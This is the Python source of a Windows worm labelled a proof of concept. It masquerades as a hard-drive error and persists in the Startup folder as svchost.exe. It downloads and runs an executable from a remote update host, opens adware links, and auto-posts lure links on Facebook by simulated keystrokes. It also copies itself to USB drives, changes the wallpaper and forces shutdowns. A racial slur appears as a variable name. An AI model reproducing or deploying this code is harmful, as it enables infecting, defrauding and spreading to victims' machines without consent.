python_worm_POC

1. # War3Add W0RM
2.  
3. # Written by cr4sh3r
4.  
5.  
6. #Modules:
7.  
8. import webbrowser, time, getpass, os, inspect, random
9. from Tkinter import *
10. import urllib, wget, sys
11. import base64, SendKeys, ctypes
12. import pythoncom, pywintypes, win32api
13. from win32com.shell import shell
14. from time import gmtime, strftime
15.  
16. # ADMIN CHECK:
17.  
18. test2 = os.getcwd()
19. quest = getpass.getuser()
20. start = "C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" % (quest)
21.  
22.  
23. if test2 == start:
24.      ctypes.windll.user32.MessageBoxA(0, "ERROR 2469, CORRUPTED HARD DRIVE!", "ERROR!", 1)
25.  
26. else:
27.      if shell.IsUserAnAdmin():
28.          ctypes.windll.user32.MessageBoxA(0, "ERROR 2469, CORRUPTED HARD DRIVE!", "ERROR!", 1)
29.  
30.  
31.      else:
32.           ctypes.windll.user32.MessageBoxA(0, "RUN ME AS AN ADMINISTRATOR, PERMISSION DENIED!", "ERROR 845!", 1)
33.           ctypes.windll.user32.MessageBoxA(0, "EJECUTAR COMO ADMINISTRADOR! ACCESO DENEGADO!", "ERROR 845!", 1)
34.           exit()
35.  
36.  
37.  
38. # DISGUISE:
39. ctypes.windll.user32.MessageBoxA(0, "ERROR 2469, CORRUPTED HARD DRIVE!", "ERROR!", 1)
40.  
41.  
42. # START-UP
43.  
44. quest = getpass.getuser()
45.  
46. test = os.getcwd() + "\\"
47.  
48. filen = inspect.getfile(inspect.currentframe())
49.  
50. start = "C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" % (quest)
51.  
52. dirvir = sys.argv[0]
53.  
54. waka = os.path.basename(sys.argv[0])
55.  
56. dirvir2 = test + waka
57.  
58. balls = "C:\\"
59.  
60.  
61. if test2 == balls:
62.      ctypes.windll.user32.MessageBoxA(0, "ERROR 666, BAD MANNERS!", "ERROR!", 1)
63.  
64. elif test2 == start:
65.      ctypes.windll.user32.MessageBoxA(0, "ERROR 13, lack of masculinity!", "ERROR!", 1)
66.  
67. else:
68.      os.system("copy " + dirvir2 + " " + balls)
69.      os.system("rename " + balls + waka + " svchost.exe")
70.      os.system("copy " + balls + "svchost.exe" + " " + "\"" + start + "\\" + "\"")
71.      time.sleep(5)
72.      os.system("del " + balls + "svchost.exe")
73.      time.sleep(5)
74.  
75.  
76.  
77. time.sleep(3)
78.  
79. cam = os.path.basename(sys.argv[0])
80.  
81. n41 = "\\bb.exe"
82. n42 = "svchost.exe"
83. n1_v0 = random.choice(["http://portugues.babylon.com/download?affID=10588", "http://goo.gl/7Kbtt", "http://dl-vip.pcfaster.baidu.com/PC_Faster_Setup_Mini_BR.exe", "http://tiny.cc/7qvvzx"])
84.  
85. if cam == n42:
86.      time.sleep(5)
87.      webbrowser.open(n1_v0)
88.  
89. else:
90.      webbrowser.open(n1_v0)
91.      
92.  
93.  
94. # Update:
95.  
96. urlupda = "http://porigom22.my3gb.com/check/c.txt"
97. f = urllib.urlopen(urlupda)
98. updater = f.read()
99. time.sleep(15)
100.  
101. if updater == "y1":
102.      wget.download("http://porigom22.my3gb.com/download/war3add.exe")
103.      os.system("start " + test + "war3add.exe")
104.      exit()
105.  
106. else:
107.      webbrowser.open("http://www.shafou.com")
108.  
109.  
110. # Loop:
111. # Url open:
112.  
113. nigga = 1
114.  
115. while nigga < 4:
116.      nigga += 1
117.      if nigga == 3:
118.           nigga -= 2
119.      time.sleep(120)
120.      n1_v1 = random.choice(["http://tiny.cc/flsm", "http://tiny.cc/baidf", "http://tiny.cc/ashf", "http://tiny.cc/nam00", "http://tiny.cc/redp4", "http://tiny.cc/redp1", "http://tiny.cc/redp2", "http://tiny.cc/redp3", "http://tiny.cc/redp5", "http://tiny.cc/redp6", "http://tiny.cc/redp7", "http://tiny.cc/redp8"])
121.      webbrowser.open(n1_v1)
122.  
123. # Pop-ups:
124.  
125.      time.sleep(115)
126.  
127.      root = Tk()
128.      root.title("666")
129.      root.geometry("450x350+100+100")
130.  
131.      n1_v2 = random.choice(["http://i.imgur.com/itvNpzx.gif", "http://i.imgur.com/wHNp0Rp.gif", "http://i.imgur.com/KmXgdak.gif", "http://i.imgur.com/nzeIAYZ.gif", "http://i.imgur.com/seCwEkV.gif", "http://i.imgur.com/EPwPjpP.gif", "http://i.imgur.com/wFRYqlD.gif", "http://i.imgur.com/Li7Swkp.gif", "http://i.imgur.com/FvcyIC2.gif", "http://i.imgur.com/IYNPEIx.gif", "http://i.imgur.com/HeBcQpe.gif", "http://i.imgur.com/11A3xjH.gif", "http://i.imgur.com/kgQ72MW.gif", "http://i.imgur.com/15Zvi4w.gif", "http://i.imgur.com/oNV1PFv.gif", "http://i.imgur.com/JAbUzsA.gif", "http://i.imgur.com/IjrBSha.gif", "http://i.imgur.com/E4PTe4f.gif", "http://i.imgur.com/sc13tyh.jpg", "http://i.imgur.com/PGSolEL.gif"])
132.  
133.      URL = n1_v2
134.  
135.      a = urllib.urlopen(URL)
136.      raw_input = a.read()
137.      a.close()
138.      b = base64.encodestring(raw_input)
139.      image = PhotoImage(data=b)
140.      label = Label(image=image)
141.      label.pack()
142.      def callback(event):
143.          webbrowser.open_new(r"http://tiny.cc/nam00")
144.  
145.      link = Label(root, text="CLIQUE AQUI PARA MAIS INFORMACOES!", fg="RED", cursor="hand2")
146.      link.pack()
147.      link.bind("<Button-1>", callback)
148.      root.mainloop()
149.      time.sleep(5)
150.  
151.  
152.  
153. # Share:
154.      
155.      time.sleep(80)
156.      #Download Links
157.      n1_v3 = random.choice(["http://tiny.cc/minecraft0VIP0cr4ck3d", "http://tiny.cc/Bruna0Marquezine0Nudes", "http://tiny.cc/Nudes00Demi0Lovato", "http://tiny.cc/Lol0rp0generator"])
158.      n1_v4 = "http://www.facebook.com/share.php?u=" + n1_v3
159.      webbrowser.open(n1_v4)
160.      time.sleep(5)
161.      SendKeys.SendKeys("{F11}")
162.      #TAB X10
163.      TABop1 = "{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}"
164.      #TAB X11
165.      TABop2 = "{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}"
166.      TABfin = random.choice([TABop1 , TABop2, TABop2, TABop2])
167.      SendKeys.SendKeys(TABfin)
168.      SendKeys.SendKeys("{ENTER}")
169.      pendrives = random.choice(["G:\"" , "F:\""])
170.      os.system("copy " + start + "\svchost.exe" + " " + pendrives)
171.  
172.  
173. # WALLPAPER:
174.  
175.      time.sleep(10)
176.      
177.      directwf1 = os.getcwd() + "\\"
178.      winfol = "C:\Windows"
179.      wallf = "625c8ae6c2d99e5bc816d09c51040eff.jpeg"
180.      directwf2 = winfol + "\\" + wallf
181.      SPI_SETDESKWALLPAPER = 20
182.  
183.  
184.      if cam != start:
185.           wget.download("https://pbs.twimg.com/profile_images/3304145857/625c8ae6c2d99e5bc816d09c51040eff.jpeg")
186.           os.system("copy " + directwf1 + wallf + " " + "C:\Windows")
187.           ctypes.windll.user32.SystemParametersInfoA(SPI_SETDESKWALLPAPER, 0, "C:\Windows" + "\\" + wallf , 0)
188.  
189.    
190.      else:
191.           ctypes.windll.user32.SystemParametersInfoA(SPI_SETDESKWALLPAPER, 0, "C:\Windows" + "\\" + wallf , 0)
192.  
193.  
194.      time.sleep(8)
195.  
196.  
197. # MESSAGES:
198.      shuttime = strftime("%H:%M")
199.      prankster = 1
200.  
201.  
202.      if shuttime == "16:20":
203.           prankster -= 1
204.           while prankster <= 2 :
205.                ctypes.windll.user32.MessageBoxA(0, "Snoop dog showed up!", "WEED!", 1)
206.  
207.      elif shuttime == "00:00":
208.           ctypes.windll.user32.MessageBoxA(0, "SLEEP TIME!", "GO TO BED!", 1)
209.           time.sleep(30)
210.           os.system("shutdown /s /t 5")
211.           exit()
212.  
213.      else:
214.           time.sleep(10)
215.           ctypes.windll.user32.MessageBoxA(0, "666", "696969", 1)
216.  
217.  
218.  
219. #Music:
220.  
221.      pdfmdir = test2
222.      url = "http://dl.findmp3.mobi/121016114/hardscorz+pai+de+familia+ai+ai+ai+mix+to+snykertesao.mp3"
223.      fnsong = "\\""hardscorz pai de familia ai ai ai mix to snykertesao.mp3"
224.      wget.download(url)
225.      time.sleep(45)
226.      os.system("start " + pdfmdir + "\"" + fnsong + "\"" + " " + "wmplayer")
227.      time.sleep(134)
228.      os.system("del " "\"" + pdfmdir + fnsong + "\"")
229.      time.sleep(5)